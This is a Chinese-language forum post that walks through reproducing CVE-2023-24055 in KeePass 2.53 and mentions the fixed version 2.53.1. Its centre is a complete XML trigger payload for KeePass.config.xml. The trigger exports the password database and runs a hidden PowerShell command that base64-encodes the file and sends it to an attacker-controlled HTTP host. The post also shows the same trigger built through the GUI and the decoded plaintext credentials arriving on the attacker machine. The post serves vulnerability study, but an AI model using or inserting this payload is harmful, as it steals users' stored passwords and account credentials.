KeePass敏感信息明文传输漏洞复现 (CVE-2023-24055)

打印 上一主题 下一主题

主题 659|帖子 659|积分 1977

一、漏洞描述

漏洞简述

KeePass 是一款免费的开源密码管理器,可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中,该数据库由一把万能钥匙锁定。因此,您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法(AES-256、ChaCha20 和 Twofish)进行加密。
对 KeePass 配置文件具有写入权限的攻击者可以修改它并注入恶意触发器,例如通过添加导出触发器来获取明文密码。
漏洞影响范围

供应商:KeePass
产品:KeePass Password Safe 2
确认受影响版本:KeePass 2.53版本
修复版本:KeePass 2.53.1版本
二、漏洞复现实战

环境搭建

Step 1 KeePass 2.53


下载地址:https://keepass.info/
Step 2 KeePass翻译语言包

下载地址:https://keepass.info/translations.html
将语言包文件复制至安装路径下“Languages”文件夹下

在KeePass中进入语言设置,切换语言

漏洞复现

根据原理,在安装路径下的配置文件KeePass.config.xml,根据触发器功能的安全缺陷进行利用。
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
创建一个触发器,在密码数据库存在交互时进行明文传输。触发器创建主要细分为两种方式:
(1)POC写入配置文件
将编写好的POC代码写入KeePass.config.xml,须符合触发器XML格式。
其中c:\Users\???\AppData\Local\Temp\exploit.xml字段为明文传输路径。
利用powershell以GET方式传输数据库中密码文件。
POC
  1.     <TriggerSystem>
  2.     <Triggers>
  3.                 <Trigger>
  4.                     <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
  5.                     <Name>exploit</Name>
  6.                     <Events>
  7.                         <Event>
  8.                             <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
  9.                             <Parameters>
  10.                                 <Parameter>0</Parameter>
  11.                                 <Parameter />
  12.                             </Parameters>
  13.                         </Event>
  14.                     </Events>
  15.                     <Conditions />
  16.                     <Actions>
  17.                         <Action>
  18.                             <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
  19.                             <Parameters>
  20.                                 <Parameter>c:\Users\???\AppData\Local\Temp\exploit.xml</Parameter>
  21.                                 <Parameter>KeePass XML (2.x)</Parameter>
  22.                                 <Parameter />
  23.                                 <Parameter />
  24.                             </Parameters>
  25.                         </Action>
  26.                         <Action>
  27.                             <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
  28.                             <Parameters>
  29.                                 <Parameter>PowerShell.exe</Parameter>
  30.                                 <Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\???\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.XXX.XXX:8888/$var -Method GET </Parameter>
  31.                                 <Parameter>False</Parameter>
  32.                                 <Parameter>1</Parameter>
  33.                                 <Parameter />
  34.                             </Parameters>
  35.                         </Action>
  36.                     </Actions>
  37.                 </Trigger>
  38.             </Triggers>         
  39.             </TriggerSystem>
复制代码
[img=720,311.6163410301954]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302201434440.png[/img]
保存KeePass.config.xml文件,触发器功能查看exploit触发器
(2)通过触发器功能手工创建触发器
以官方触发器构成为参考
https://keepass.info/help/kb/trigger_examples.html
exploit触发器配置如下:
属性项:命名为exploit,其余默认配置

事件项:选择Saved database file(已保存数据库文件),判断条件选Equals(相等)

条件项:为空

操作项

  • 导出当前数据库
文件路径为上述文件传输路径
文件格式选择 KeePass XML (2.x)

  • 执行命令行/URL
文件路径为PowerShell.exe ,使触发器执行PowerShell
参数选择攻击接收的路径
窗口方式选择Hidden

完成创建,可以看到exploit触发器
在攻击机 创建web服务,后续接收传输后的密码明文;
在KeePass中新建一条密码记录并保存,可以看到攻击机终端已接收到明文信息

[img=720,473.9470365699874]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302201434446.png[/img]
进行base64解码,可以看到内容为密码记录内容,包含账号与密码等敏感信息。
[img=720,325.5882352941176]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302201434447.png[/img]
漏洞修复

建议更新至KeePass 2.53.1 版本
结束语

本文主要介绍了CVE-2023-24055 KeePass敏感信息明文传输漏洞的复现过程,漏洞主要利用对 KeePass 配置文件在写入权限下可以修改它并注入恶意触发器,例如通过添加导出触发器来获取明文密码。
更多靶场实验练习、网安学习资料,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

光之使者

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表